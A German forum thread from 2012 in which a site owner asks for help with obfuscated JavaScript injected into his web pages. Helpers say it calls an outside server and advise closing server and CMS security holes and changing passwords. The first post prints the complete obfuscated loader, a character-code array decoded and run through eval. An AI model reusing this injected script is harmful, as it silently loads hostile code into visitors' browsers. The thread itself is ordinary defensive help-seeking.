|
Diskussionsforum: Schadstoffcode iauf meinem WebserverWindows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben. |
07.11.2012, 21:36 | #1 |
| Schadstoffcode iauf meinem Webserver Hi, ich habe heute auf meinem Webserver folgenden Schadstoffcode entdeckt. Leider ist der Verschlüsselt. Kennt den jemand zbw. kann mir einer Sagen was er genau macht? HTML-Code: <!--adea77--><script type="text/javascript" language="javascript" > if(021===0x11)v="va"+"l";try{faweb--}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,111,103,107,100,119,32,60,37,103,110,109,103,107,99,95,114,98,52,51,50,102,38,57,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,114,112,45,103,122,97,95,107,110,107,111,113,108,105,98,120,97,45,102,111,108,99,46,111,106,47,96,98,109,104,108,105,114,114,114,96,114,111,113,45,99,110,107,112,110,108,101,109,114,115,46,97,111,108,93,99,110,108,102,104,101,47,113,99,101,107,44,112,103,110,39,58,11,10,31,95,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,95,46,114,114,121,107,99,46,97,109,114,99,99,114,31,59,32,38,46,39,58,11,10,31,95,46,114,114,121,107,99,46,103,99,105,102,102,116,31,59,32,38,47,112,119,37,59,12,8,32,96,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,107,99,102,115,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,115,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,105,101,38,97,111,103,107,100,119,61,60,37,39,40,30,123,9,30,32,117,95,114,31,112,101,114,110,111,109,113,101,31,59,32,38,99,114,113,109,114,38,57,10,31,123,10,31,103,102,39,31,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,96,98,112,107,37,41,40,11,10,31,121,13,9,30,100,110,97,117,108,99,110,115,44,119,113,103,116,100,38,39,59,98,105,117,30,105,99,59,92,38,95,100,111,106,92,38,60,60,46,98,105,117,60,39,40,57,13,9,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,96,98,112,107,37,41,45,95,112,111,99,110,99,65,104,104,106,100,39,95,41,58,11,10,31,123,13,9,123,41,39,39,59);}w=f;s=[];r=String;for(i=0;-i+535!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");}</script><!--/adea77--> |
07.11.2012, 21:57 | #2 |
| Schadstoffcode iauf meinem Webserver Das was du hier zeigst ist lediglich der HTML Tag für Javascript,poste lieber den Code der zwischen den <Script> und </Script> steht.
__________________
__________________ |
07.11.2012, 22:16 | #3 |
/// Malware-holic | Schadstoffcode iauf meinem Webserver das teil verbindet zumindest schon mal auf nen ftp server, danach gehts nicht weiter, guck gleich noch mal
__________________
__________________ |
07.11.2012, 22:19 | #4 |
/// Malware-holic | Schadstoffcode iauf meinem Webserver a server ist leer, aber nicht mal passwort geschützt :d
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
07.11.2012, 22:30 | #5 |
| Schadstoffcode iauf meinem Webserver Meinst den Verver von der Schadstoffware? |
07.11.2012, 22:35 | #6 |
/// Malware-holic | Schadstoffcode iauf meinem Webserver jo, das script verbindet zu einem ftp server, der als endung .pl hatt hab aber keine whois info abfrage gemacht, weis also nicht, ob er auch in polen steht.
__________________ --> Schadstoffcode iauf meinem Webserver |
07.11.2012, 22:52 | #7 |
| Schadstoffcode iauf meinem Webserver Könntest du mir den Entschlüsselten Code mal an meine PN Box schicken? Würde gerne mal Sehen, was da reingeschrieben wurde. |
07.11.2012, 22:57 | #8 |
/// Malware-holic | Schadstoffcode iauf meinem Webserver da mal hochladen jsunpack - a generic JavaScript unpacker
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
08.11.2012, 08:14 | #9 |
/// Helfer-Team | Schadstoffcode iauf meinem Webserver Ist doch vorhanden. Nach rechts gescrollt?
__________________ Kein Support per PM! |
08.11.2012, 17:41 | #10 |
| Schadstoffcode iauf meinem Webserver @markusg Danke für deine Infos und den Link! |
08.11.2012, 17:49 | #11 |
/// Malware-holic | Schadstoffcode iauf meinem Webserver kein prob. du solltest sicherheitslücken auf dem server schließen, zb wenn du wordpress nutzt, unnötige plugins rausschmeißen, etc, wenn man genaueres wüsste, könnte man da evtl. noch mehr sagen was zu tun ist.
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
13.11.2012, 11:53 | #12 |
| Schadstoffcode iauf meinem Webserver Dieses Ding verbreitet sich sehr schnell. Habe den Code jetzt schon auf 2 verschiedenen Seiten auf meinem Server entdeckt. Und wenn man googlet findet man haufenweise betroffene Seiten. Ich weiß aber nicht wie ich es weg kriege. Einfaches löschen hilft nix. Auch Umzug, Umbenennen der Variablen oder bearbeiten der Upload Variablen hat nichts gebracht. Der Code war noch einiger Zeit wieder da. Der Link zum entschlüsseln hat mir übrigens nicht viel Erkenntnis gebracht. Hat denn schon jemand weitere Infos, wo das Ding her kommt und vor allem wie es auf die Seiten kommt? |
13.11.2012, 12:06 | #13 |
/// Malware-holic | Schadstoffcode iauf meinem Webserver schließe alle sicherheitslücken in genutzten cms, evtl. sicherheitslücken des servers schließen, passwörter endern, evtl. pc hier mal im bereich plagegeister auf malware untersuchen lassen.
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
13.11.2012, 12:50 | #14 |
/// Mr. Schatten | Schadstoffcode iauf meinem Webserver Doch, denn wenn es nicht dein wirklich persönlicher Server ist (egal ob bei dir zuhause oder in einem Rechenzentrum). Ansonsten sind z.B. veraltetes PHP, CMS-Software (falls eingesetzt), veraltete Webserversoftware und vorallem und subjektiver Erfahrung nach schlecht/unsichere FTP-Accounts die Ursache für eine Reinfektion. In soweit hast du recht, einfaches löschen hilft nicht, man muss sich schon bewegen.
__________________ alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung keine Hilfe via PN hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort - |
13.11.2012, 14:09 | #15 |
| Schadstoffcode iauf meinem Webserver Glaub mir... ich habe eine Menge unternommen. Ich habe wie gesagt, sämtliche PHP Dateien durchsucht, ich habe Upload Variablen umbenannt, ich habe alle Passwörter geändert. CMS nutze ich nicht. Ich bin mit der Seite an einen anderen Ort umgezogen. Jetzt habe ich das Teil woanders gefunden. Ich frage am Anfang der Seite den LogStatus ab, und wenn es noch keinen Login gab, wird die Default Seite gezeigt. Und mitten in dieser Else Anweisung stand dann der Code. Also an einer Stelle, wo nicht mal etwas per POST oder GET gesendet wird, wo man also nicht mal ein XSS einschleusen könnte. Alsa letzte Instanz bin ich jetzt auf einen anderen Server umgezogen und logge sämtliche Klicks (,also alles was passiert,) auf der Seite mit. Mal gucken ob es nochmal wieder kommt. Aber trotzdem würde mich schon interessieren, wo das Ding herkommt und was der Code macht. Der o.a. Link zum entschlüsseln hat nicht viel erklärt. |
Themen zu Schadstoffcode iauf meinem Webserver |
entdeck, folge, folgende, folgenden, heute, html, script, webserver |